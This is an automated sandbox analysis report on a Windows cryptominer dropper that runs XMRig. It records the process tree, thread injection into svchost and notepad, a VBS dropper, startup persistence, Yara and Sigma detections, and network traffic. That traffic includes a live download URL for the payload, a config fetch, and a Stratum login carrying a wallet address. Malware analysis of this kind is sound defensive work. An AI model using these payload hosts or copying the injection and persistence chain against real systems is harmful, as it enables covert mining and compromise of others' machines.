Play interactive tour

Edit tour

Windows Analysis Report LZF5sOWnss

Overview

General Information

Sample Name:	LZF5sOWnss (renamed file extension from none to exe)
Analysis ID:	453465
MD5:	0f65b4fa711b40e3c89a81fa69d8690f
SHA1:	19240a26f205be2f8b4f4e00583a987e184f2875
SHA256:	af18c1e923667ab287cd2699203e0bb6e6030dee131299ea670bc842dec76745
Tags:	32CoinMinerXMRigexetrojan
Infos:
Most interesting Screenshot:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

System process connects to network (likely due to code injection or exploit)

Yara detected Xmrig cryptocurrency miner

.NET source code contains potential unpacker

Allocates memory in foreign processes

Creates a thread in another existing process (thread injection)

DNS related to crypt mining pools

Detected Stratum mining protocol

Found strings related to Crypto-Mining

Injects a PE file into a foreign processes

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

LZF5sOWnss.exe (PID: 6868 cmdline: 'C:\Users\user\Desktop\LZF5sOWnss.exe' MD5: 0F65B4FA711B40E3C89A81FA69D8690F)

tmp70CEtmp.exe (PID: 1808 cmdline: 'C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe' MD5: D572DA9202196121D952231F26D65D07)

tmp70CEtmp.exe (PID: 6344 cmdline: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe MD5: D572DA9202196121D952231F26D65D07)

tmp70CEtmp.exe (PID: 3496 cmdline: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe MD5: D572DA9202196121D952231F26D65D07)

kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe (PID: 5188 cmdline: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe MD5: 77276DDC82248473D033E2494C438A97)

notepad.exe (PID: 684 cmdline: 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg' MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)

cmd.exe (PID: 5212 cmdline: cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

wscript.exe (PID: 5308 cmdline: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

svchost.exe (PID: 6964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6780 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author
0000000F.00000003.813001280.0000018B883B5000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000F.00000002.908582962.00000000009D7000.00000040.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000F.00000002.909337744.0000018B884BA000.00000004.00000040.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000D.00000002.911228478.0000000003510000.00000040.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000E.00000000.802901218.00000000013C0000.00000040.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000E.00000000.807605036.00000000013C0000.00000040.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000E.00000000.805475316.00000000013C0000.00000040.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000F.00000002.909258259.0000018B88392000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.2.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
13.2.tmp70CEtmp.exe.3510000.3.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.3.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
13.2.tmp70CEtmp.exe.400000.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
13.2.tmp70CEtmp.exe.400000.1.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.5.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
15.2.notepad.exe.400000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x2680d1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x2658b5:$s1: [%s] login error code: %d 0x26fd30:$s2: \\?\pipe\uv\%p-%lu
15.2.notepad.exe.400000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 4 entries

Sigma Overview

System Summary:

Sigma detected: WScript or CScript Dropper

Show sources

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', CommandLine: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', CommandLine|base64offset|contains: Y'+, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5212, ProcessCommandLine: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', ProcessId: 5308

Data Obfuscation:

Sigma detected: Drops script at startup location

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 5308, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://45.144.225.135/notepad.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://45.144.225.135/notepad.exe

Virustotal: Detection: 14%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\LKBNMTFJgl\csrss	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Show sources

Source: LZF5sOWnss.exe	Virustotal: Detection: 58%	Perma Link
Source: LZF5sOWnss.exe	Metadefender: Detection: 22%	Perma Link
Source: LZF5sOWnss.exe	ReversingLabs: Detection: 32%

Machine Learning detection for sample

Show sources

Source: LZF5sOWnss.exe

Joe Sandbox ML: detected

Source: 13.2.tmp70CEtmp.exe.400000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.5.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 14.2.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.3.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 13.2.tmp70CEtmp.exe.3510000.3.unpack	Avira: Label: TR/Dropper.Gen

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00408B20 CreateFileW,CryptAcquireContextW,CloseHandle,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,FindCloseChangeNotification,		13_2_00408B20
Source: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe	Code function: 14_2_013C8B20 CreateFileW,CryptAcquireContextW,CloseHandle,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,		14_2_013C8B20

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 14.2.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmp70CEtmp.exe.3510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmp70CEtmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmp70CEtmp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe.13c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000003.813001280.0000018B883B5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.908582962.00000000009D7000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.909337744.0000018B884BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.911228478.0000000003510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.802901218.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.807605036.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.805475316.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.909258259.0000018B88392000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp, type: MEMORY

DNS related to crypt mining pools

Show sources

Source: unknown

DNS query: name: xmr-us-east1.nanopool.org

Detected Stratum mining protocol

Show sources

Source: global traffic

TCP traffic: 192.168.2.4:49767 -> 142.44.242.100:14444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"48qbpzutwm8gg6t6eg6h7jgxad6enjh8o3roylgbeqym7txydu9tfmfuugaheqa7bfdhtfb9d665cgydj6f5kvdjlegjmdw.worker/picktutos","pass":"x","agent":"xmrig/5.11.1 (windows nt 10.0; win64; x64) libuv/1.34.0 gcc/8.2.0","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","argon2/chukwa","argon2/wrkz","astrobwt"]}}.

Found strings related to Crypto-Mining

Show sources

Source: notepad.exe, 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	String found in binary or memory: stratum+ssl://
Source: notepad.exe, 0000000F.00000002.908582962.00000000009D7000.00000040.00000001.sdmp	String found in binary or memory: CryptonightR_instruction0
Source: notepad.exe, 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: notepad.exe, 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	String found in binary or memory: stratum+tcp://
Source: notepad.exe, 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: notepad.exe, 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	String found in binary or memory: XMRig 5.11.1

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Unpacked PE file: 13.2.tmp70CEtmp.exe.3510000.3.unpack

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\LZF5sOWnss.exe

Unpacked PE file: 0.2.LZF5sOWnss.exe.7f0000.0.unpack

Source: LZF5sOWnss.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: global traffic

TCP traffic: 192.168.2.4:49767 -> 142.44.242.100:14444

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 23 Jul 2021 20:24:24 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Last-Modified: Fri, 23 Jul 2021 15:30:06 GMTETag: "375a00-5c7cc13fa9b80"Accept-Ranges: bytesContent-Length: 3627520Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 e0 fa 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 28 37 00 00 30 00 00 00 00 00 00 92 47 37 00 00 20 00 00 00 60 37 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 37 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 47 37 00 57 00 00 00 00 60 37 00 20 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 37 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 27 37 00 00 20 00 00 00 28 37 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 2c 00 00 00 60 37 00 00 2e 00 00 00 2a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 37 00 00 02 00 00 00 58 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 47 37 00 00 00 00 00 48 00 00 00 02 00 05 00 3c 2d 37 00 fc 19 00 00 03 00 00 00 1c 00 00 06 fc 33 00 00 40 f9 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1c 1e 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 17 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 15 00 00 00 00 00 00 00 02 28 15 00 00 0a 02 19 2d 03 26 2b 07 28 0d 00 00 06 2b 00 2a 00 00 00 06 2a 00 00 06 2a 00 00 06 2a 00 00 06 2a 00 00 06 2a 00 00 06 2a 00 00 06 2a 00 00 03 30 09 00 27 00 00 00 00 00 00 00 03 2c 13 02 7b 02 00 00 04 2c 0b 02 7b 02 00 00 04 6f 16 00 00 0a 02 03 1c 2d 04 26 26 2b 07 28 17 00 00 0a 2b 00 2a 00 03 30 04 00 4c 05 00 00 00 00 00 00 02 73 18 00 00 0a 1c 3a db 04 00 00 26 26 02 73 18 00 00 0a 19 3a d7 04 00 00 26 26 02 73 18 00 00 0a 19 3a d3 04 00 00 26 26 02 73 18 00 00 0a 17 3a cf 04 00 00 26 26 02 73 18 00 00 0a 1b 3a cb 04 00 00 26 26 02 73 18 00 00 0a 18 3a c7 04 00 00 26 26 02 73 18 00

Source: global traffic

HTTP traffic detected: GET /notepad.exe HTTP/1.1Host: 45.144.225.135Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 45.144.225.135 45.144.225.135
Source: Joe Sandbox View	IP Address: 142.44.242.100 142.44.242.100

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135
Source: unknown	TCP traffic detected without corresponding DNS query: 45.144.225.135

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Code function: 13_2_00404B00 GetTickCount,GetTickCount,InternetCrackUrlA,InternetOpenA,InternetConnectA,InternetCloseHandle,GetTickCount,HttpOpenRequestA,GetTickCount,GetTickCount,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

13_2_00404B00

Source: global traffic	HTTP traffic detected: GET /notepad.exe HTTP/1.1Host: 45.144.225.135Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /config.txt HTTP/1.1Accept: text/*, application/exe, application/zlib, application/gzip, application/applefileUser-Agent: WinInetGet/0.1Host: 45.144.225.135Connection: Keep-AliveCache-Control: no-cache

Source: svchost.exe, 00000007.00000002.762235703.0000022EEA12A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-22T08:44:38.4912040Z\|\|.\|\|1fd47fbe-cde9-4024-853a-cbf16f3653f1\|\|1152921505693686761\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
